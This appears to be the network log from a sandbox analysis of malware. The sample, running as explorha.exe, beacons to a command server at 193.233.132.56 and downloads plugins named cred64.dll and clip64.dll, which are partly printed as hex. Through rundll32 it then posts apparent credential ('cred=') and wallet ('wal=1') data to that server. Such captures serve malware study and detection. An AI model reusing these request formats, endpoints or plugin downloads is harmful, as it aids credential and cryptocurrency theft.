                                                                                                    Apr 19, 2024 04:27:07.690675020 CEST4981280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.694333076 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.694603920 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.695106983 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:07.942697048 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.948261976 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:07.948618889 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.054871082 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.055298090 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.300291061 CEST8049814193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.300776958 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.300885916 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.302567005 CEST8049813193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.302638054 CEST4981380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.316525936 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.319967985 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.545691013 CEST8049814193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.545897961 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.546319008 CEST8049814193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.550183058 CEST4981480192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.568922043 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.570205927 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.570480108 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.819010973 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.824134111 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:08.824327946 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.943562031 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:08.943798065 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.183475018 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.183563948 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.183873892 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.192076921 CEST8049815193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.192135096 CEST4981580192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.423762083 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.423971891 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.424151897 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.428807020 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.429157972 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.668894053 CEST8049816193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.668978930 CEST4981680192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.672027111 CEST8049817193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.672137022 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.672518015 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.674988985 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.790683985 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:09.915292025 CEST8049817193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:09.915579081 CEST4981780192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.039366007 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.039618015 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.039843082 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.288331985 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.289077044 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.289201021 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.292138100 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.292444944 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.538249016 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.538342953 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.539391041 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.540656090 CEST8049818193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.540756941 CEST4981880192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.784785032 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.789206028 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:10.789350986 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.898983955 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:10.899274111 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.143311977 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.143568993 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.144627094 CEST8049819193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.144687891 CEST4981980192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.146917105 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.390809059 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.391524076 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.391748905 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.394901037 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.395313025 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.638576984 CEST8049820193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.638763905 CEST4982080192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.642538071 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.642613888 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.642908096 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:11.890319109 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.900167942 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:11.900259018 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.009711981 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.010586023 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.255486012 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.255578995 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.261293888 CEST8049821193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.261461020 CEST4982180192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.265222073 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:12.510149002 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.510799885 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:12.510977030 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.215291977 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.215569019 CEST4982380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.460589886 CEST8049822193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:13.462201118 CEST4982280192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.464139938 CEST8049823193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:13.464221954 CEST4982380192.168.2.4193.233.132.56
                                                                                                    Apr 19, 2024 04:27:13.673649073 CEST8049744193.233.132.56192.168.2.4
                                                                                                    Apr 19, 2024 04:27:13.676240921 CEST4974480192.168.2.4193.233.132.56
                                                                                                    • 193.233.132.56
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:03.920797110 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:04.165822029 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:04.167273998 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:04.416256905 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:03.924387932 CEST | 69 | OUT | GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1
                                                                                                    Host: 193.233.132.56
Apr 19, 2024 04:26:04.173118114 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 1285632
                                                                                                    Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT
                                                                                                    Connection: keep-alive
                                                                                                    ETag: "65e464f9-139e00"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Ascii: PhHHHHHHHHHH H8H@(HXH`HHxHhHHHH
                                                                                                    Apr 19, 2024 04:26:04.173372984 CEST1289INData Raw: 00 00 0f 00 00 00 88 90 c8 00 00 00 48 89 90 f8 00 00 00 48 c7 80 00 01 00 00 0f 00 00 00 88 90 e8 00 00 00 48 89 90 18 01 00 00 48 c7 80 20 01 00 00 0f 00 00 00 88 90 08 01 00 00 48 89 90 38 01 00 00 48 c7 80 40 01 00 00 0f 00 00 00 88 90 28 01
                                                                                                    Data Ascii: HHHH H8H@(HXH`HHxHhHHHHHHHHHH
                                                                                                    Apr 19, 2024 04:26:04.173414946 CEST1289INData Raw: 00 0f 00 00 00 88 90 28 01 00 00 48 89 90 58 01 00 00 48 c7 80 60 01 00 00 0f 00 00 00 88 90 48 01 00 00 48 89 90 78 01 00 00 48 c7 80 80 01 00 00 0f 00 00 00 88 90 68 01 00 00 48 89 90 98 01 00 00 48 c7 80 a0 01 00 00 0f 00 00 00 88 90 88 01 00
                                                                                                    Data Ascii: (HXH`HHxHhHHHHHHHHHH H8H@(HXH`HHxH
                                                                                                    Apr 19, 2024 04:26:04.173455000 CEST1289INData Raw: 00 48 8d 0d c5 9a 0f 00 e9 b4 cf 0c 00 48 8d 0d 15 9b 0f 00 e9 a8 cf 0c 00 48 8d 0d 49 9b 0f 00 e9 9c cf 0c 00 48 83 ec 28 48 8d 0d 75 b8 12 00 e8 ac dc 0c 00 48 8d 0d 75 9b 0f 00 48 83 c4 28 e9 7c cf 0c 00 b8 01 00 00 00 c3 cc cc cc cc cc cc cc
                                                                                                    Data Ascii: HHHIH(HuHuH(|H\$Hl$Ht$ WAVHLTAL5GL@AAt'AB0TB82TuIIEAExAB0TAB0T+uHE3LHuED8t
                                                                                                    Apr 19, 2024 04:26:04.173497915 CEST1289INData Raw: 8b 57 10 48 8b cb e8 41 b8 06 00 48 8b 3f 48 85 ff 75 ec 48 8b 7e 10 48 85 ff 74 14 48 8b 57 10 48 8b cb e8 74 38 04 00 48 8b 3f 48 85 ff 75 ec 8b 43 28 41 ff c7 48 83 c5 20 44 3b f8 0f 8c 49 ff ff ff 48 8b 6c 24 20 4c 89 b3 20 03 00 00 41 8b fe
                                                                                                    Data Ascii: WHAH?HuH~HtHWHt8H?HuC(AH D;IHl$ L A~0IHC HL0HtD8qtiuUH ;{(|HL$(D$0DuH{HL$0H AD$0HtgfDHHE^L9 tHH1-3H;hr"H;psH`
                                                                                                    Apr 19, 2024 04:26:04.422019005 CEST1289INData Raw: 95 c0 88 46 2b 33 c0 eb 05 b8 01 00 00 00 48 8b 4c 24 78 48 33 cc e8 28 bf 0c 00 4c 8d 9c 24 80 00 00 00 49 8b 5b 20 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 48 83 ec 08 80 79 2a 00 4c 8b d9 0f 85 2e 01 00 00 80 79 28 00 48 89 1c 24 74 0c 8b 41 08 44
                                                                                                    Data Ascii: F+3HL$xH3(L$I[ Ik0IA^_^Hy*L.y(H$tADIYAAD@AC*AAIDOQADAADhAAOiQQDAADAlDiAAAA+


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:04.765908003 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:05.011949062 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:05.012571096 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:05.262514114 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:05.629507065 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:05.880311012 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:05.880964994 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:06.136245012 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:06.485609055 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:06.732579947 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:06.733300924 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:06.983726978 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0
Apr 19, 2024 04:26:06.995637894 CEST | 69 | OUT | GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1
                                                                                                    Host: 193.233.132.56
Apr 19, 2024 04:26:07.242974997 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 112128
                                                                                                    Last-Modified: Sun, 03 Mar 2024 11:54:32 GMT
                                                                                                    Connection: keep-alive
                                                                                                    ETag: "65e464f8-1b600"
                                                                                                    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:07.348438978 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
Apr 19, 2024 04:26:07.592777967 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:07.593668938 CEST | 310 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Apr 19, 2024 04:26:07.841701984 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 193.233.132.56 | 80 | 6960 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 04:26:07.803128958 CEST | 176 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 21
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                    Data Ascii: id=246122658369&cred=
Apr 19, 2024 04:26:08.051520109 CEST | 190 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
Apr 19, 2024 04:26:14.943864107 CEST | 172 | OUT | POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----NjE0MA==
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 6300
                                                                                                    Cache-Control: no-cache
